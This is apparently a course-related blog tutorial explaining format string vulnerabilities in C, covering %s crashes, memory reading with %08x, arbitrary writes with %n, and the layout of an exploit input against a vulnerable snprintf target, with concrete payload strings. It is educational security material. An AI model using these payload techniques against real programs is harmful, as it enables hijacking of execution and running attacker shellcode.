Format String Vulnerability

This is the second part of our buffer overflow topic, visit the first part if you need some background information. In this part, we’ll see what’s the format string vulnerability and how we can use make use of it to exploit a program. This part is more challenging since it requires additional knowledge about the format string and how we can use its feature to reach our goal.

a. Intro to format string

The format string should be familiar to us; we’ll use it to print stuff to console in c/c++ program. Common format functions are fprintf, printf, sprintf, snprintf, etc. We will focus on printf and snprintf here. Look at the example below:

void PrintName (char *name) {
  printf("My name is %s", name);
}

The format string here is “My name is %s”, where %s is a specifier for string of characters. The stack virtualization looks like:

top of stack                                                bottom of stack
lower memory                                                  higher memory
[--printf() function frame--][-ebp-][-eip-][--params--][--PrintName func frame--]
                                           [&str|&name]
* &str is the address of the format string ("My name is %s")
* &name is the address of the name

Notice there are two params in printf function in this case: a format string and a string. What if there are 10 params in this function, how does printf retrieve them? Inside printf function, there is an internal pointer that initially points to the second param. When encountering a format specifier, the function will retrieve the corresponding param, and the internal pointer will move towards the bottom of the stack. Another concrete example:

printf("Numbers: %d, %d", 5, 6);

It’s stack and internal pointer look like:

top of stack                                           bottom of stack
lower memory                                             higher memory
[--------function frame--------][-ebp-][-eip-][--params--][...]
                                              [&str][5][6]
                                                     ^ (internal pointer
                                                        starts here)
* &str is the address of the format string

This is helpful since we might want to increase this internal pointer in the later discussion.

These print functions work great if we follow their design (one format specifier with one param). But we can play around with these functions and make exploits. The idea of exploit/vulnerability is we only provide the format string but no or fewer params. Let’s see what we can do in this case.

b. Crash of the program

What if the format string is provided by the user, and we can change it to whatever we want. One vulnerability here is, by designed input, we can crash the program. Consider the case:

void foo (char *name) {
  printf("%s%s%s%s%s%s%s%s%s%s\n");
}

Because “%s” will display strings on the stack and we have 10 %s here, the foo() function will look at the stack and try to retrieve 10 parameters, interpret them as strings and display them. But we haven’t supply any string, the function doesn’t know this and will still retrieve 10 parameters as if our string exists. This means printf function will start from the internal pointer, interpret it as a string and move the pointer upward and interpret the next one until all ten %s has been processed. These “string” are other data on the stack. If we have enough %s specifier, printf function might reach data from illegal address (data under the internal pointer is read-only or out of scope), and then the program will crash.

c. Viewing the memory

By using the same trick, we can view the process memory, just like in dgb

printf ("%08x,%08x,%08x,%08x,%08x\n");

“%08x”, like “%s”, is a specifier to display data as 8-digit padded hexadecimal numbers. “,” is just a seperater. We might get something like:

40012980,080628c4,bffff7a4,00000005,08059c04

Here, we can use “%08x” to increase the interal stack pointer of the format function towards the top of the stack by 4 bytes. Why? Look at the virtualization of the stack:

top of stack                                           bottom of stack
lower memory                                             higher memory
[<------------------------------------------------------------stack]
[------print function frame------][ebp][eip][params][Caller's frame]
                                           [-&str-][...]
                                                   ^ (internal pointer
                                                      starts here)

In the earlier example, we have corresponding params (for example, name for %s). After reading the format string, the internal pointer will retrieve the value and moves to the next memory address when encountering a specifier. Here we don’t have other params on the stack, but we have “%08x”. In this case, the internal pointer will start at the Caller’s frame and moves toward the bottom of the stack by 4 bytes for each %08x.

d. Writing to an arbitrary address

Another tool we will use is the format specifier, “%n”, this will print the number of characters in printf() before the occurrence of %n, for example:

int i;
printf("12345%n\n", &i);
printf("value of i is: %d\n", i);
return 0;

Result: 12345
        value of i is 5 (before %n, there are 5 chars)

More examples can be found at tutorialspoint.

Our final goal is to change the saved return address so that our shellcode can be executed. And here, by using %n, we are allowed to write to an arbitrary address, which means we can change the saved eip, and the problem is solved.

In the above example, we successfully write the number 5 to the address of variable i. Image what if the argument ‘&i’ doesn’t exist, like 4.b and 4.c. We will write the number 5 to the address pointed by the internal pointer. Since we can move that pointer towards the bottom of the stack, we are likely to let the internal pointer points to the exact address of the saved eip. And now we can change the value of eip to whatever we want by using %n.

But the first big question is that the address is usually a large number, e.g., say 0xbfffffca is the address of the shellcode. If we want to change the saved eip to this value, by the above naive method, we have to insert 3221225418 chars before %n. However, it’s nearly impossible to have a buffer in such a huge size.

One method we can use here is that, instead of having the real characters before %n, we can use another format specifier as a “place holder.” For example:

int a;
printf("%10d%n", 1024, &a);
printf("value of a is: %d");

Result: 
      1024
value of a is: 10

Here, %10d means to read the coordinate argument, which is 1024, and print it as a 10 digit integer. It doesn’t matter if the argument has 10 digits or not; any number(2048/123/…) is ok. Since before %n, we have 10 digits(chars), we can see that the value of ‘a’ will be set to 10 in this case. So by this method, we can set the value that %n will print to a large number, but we don’t actually need to have that much number of chars before %n. Also, notice that any specifier, %10f, %10u, %10x are all workable here.

But the above method also has a limitation. It still can’t handle numbers that are too big, e.g., the 4-byte memory address.

There are two solutions here. One solution is that if the address of saved eip is close to our shellcode, we don’t need to change all 4 bytes of address. For example, 0xbfffffca -> 0xbffffeca, since the first 2 bytes are the same, we only need to change 2 bytes here. And by the above method, we calculate 0xfeca = 65226, and we are good to go.

Another solution is that we can change 1 byte at a time, and after 4 changes, we can change the saved eip to the value we want. But there are 2 points we need to be careful: 1) %n is cumulative, later %n write will counter all chars before it.

int a,b,c,d;
printf("%10d%n%20d%n%30d%n%40d%n", 1024, &a, 1024, &b, 1024, &c, 1024, &d);

Result: 
a:10  b:30  c:60  d: 100

2) every change to a memory location is always 4 bytes.

It might be confusing since we want to change 1 byte once but every change is 4 byte. Let’s assume the internal pointer has already pointed to the address we’d like to modify and look at the following example:

printf("%10d%n%20d%n%30d%n%40d%n")

We’ll have 0A1E3C64 (hex representation) under to the internal pointer.

Thus, we can use this method to write a 4-byte address into the stack. For example, to write bffffca4, we write a4 fc ff bf to the internal pointer (little-endian). “%164d%n%88d%n%3d%n%192d%n” should work here. Using the overflow trick if the later one is smaller. For example, bf < ff, we replace 0xbf to 0x1bf and 1 will overflow.

e. Example

Now, let’s apply all we learned before. Look at the following example target code:

int foo(char *arg)
{
  char buf[480];
  snprintf(buf, sizeof buf, arg);
  return 0;
}

int main(int argc, char *argv[])
{
  if (argc != 2)
    {
      fprintf(stderr, "target5: argc != 2\n");
      exit(EXIT_FAILURE);
    }
  foo(argv[1]);

  return 0;
}

The snprintf() function formats and stores a series of characters and values in the array buffer. But the input string is under the user’s control, making format string exploit possible.

My exploit design/ input string layout: 4*<address-dummy pair><stackpop><write-code><NOPS><shelllcode>:

<address-dummy pair>: “\x9c\xfc\xff\xbf\x01\x01\x01\x01”, an address that we want to modify in one byte. Since later we will use %d%n, we need a dummy value between address to make sure
no address here will be skipped.

<stackpop>: “%08x”, this will increase the internal pointer by 4 bytes. In printf function, we want this pointer point to the first ADDR, or the beginning of the buffer where our address-dummy pairs located. Try several times we can know how many bytes we need to skip. (Here, we need 2 to skip ebp and eip)

<write-code>: in form %xd%n *4, where x is an integer. We need four of this since we need to write to four different addresses, 1 byte each time.

And we want to insert some NOP before SHELLCODE to increase flexibility. Combining all of them, we’ll get the designed input string to exploit the target. Full exploit code can be found in my Github repo at the end.

Example codes are selected from the coursework of COMPSCI642: Introduction to Information Security taught by Prof. Earlence Fernandes @ the University of Wisconsin-Madison.

Thanks for reading! Now we’ve finished all of our discussion about buffer overflow and format string vulnerabilities. Any comments or suggestions will be appreciated.

Kai